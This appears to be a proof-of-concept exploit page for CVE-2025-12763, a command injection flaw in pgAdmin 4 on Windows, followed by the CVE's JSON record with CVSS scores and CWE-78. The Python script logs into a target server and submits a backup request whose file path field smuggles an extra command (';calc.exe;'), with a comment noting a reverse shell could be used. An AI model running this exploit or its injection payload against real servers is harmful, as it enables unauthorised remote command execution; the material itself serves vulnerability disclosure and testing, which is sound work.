CVE-2025-12763

#!/usr/bin/env python3 """ CVE-2025-12763 PoC - pgAdmin 4 Command Injection on Windows This PoC demonstrates the command injection vulnerability in pgAdmin 4's backup/restore functionality. """ import requests import json # Configuration TARGET_URL = "http://target-server:5050" USERNAME = "admin" PASSWORD = "admin_password" def exploit_command_injection(): """ Exploit the command injection vulnerability in pgAdmin 4 by providing a malicious file path during backup operation. """ # Login to pgAdmin 4 session = requests.Session() login_url = f"{TARGET_URL}/api/authenticate/login" login_data = { "username": USERNAME, "password": PASSWORD } response = session.post(login_url, json=login_data) if response.status_code != 200: print("[-] Login failed") return False print("[+] Login successful") # Malicious payload - injects calc.exe command via file path # In real attack, this could be a reverse shell or other malicious command malicious_path = ";calc.exe;" # Trigger backup operation with malicious file path backup_url = f"{TARGET_URL}/api/backup" backup_data = { "filepath": malicious_path, "database": "target_db", "format": "custom" } try: response = session.post(backup_url, json=backup_data) if response.status_code == 200: print("[+] Command injection successful - calc.exe should have executed") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except Exception as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": print("CVE-2025-12763 - pgAdmin 4 Command Injection PoC") print("=" * 50) exploit_command_injection()

{"cve": {"id": "CVE-2025-12763", "sourceIdentifier": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "published": "2025-11-13T13:15:44.777", "lastModified": "2025-12-01T20:15:49.517", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "pgAdmin 4 versions up to 9.9 are affected by a command injection vulnerability on Windows systems. This issue is caused by the use of shell=True during backup and restore operations, enabling attackers to execute arbitrary system commands by providing specially crafted file path input."}], "metrics": {"cvssMetricV31": [{"source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pgadmin:pgadmin_4:*:*:*:*:*:postgresql:*:*", "versionEndExcluding": "9.10", "matchCriteriaId": "869DC8C4-E456-4D31-964B-96D4B9B8F4A2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://github.com/pgadmin-org/pgadmin4/issues/9323", "source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}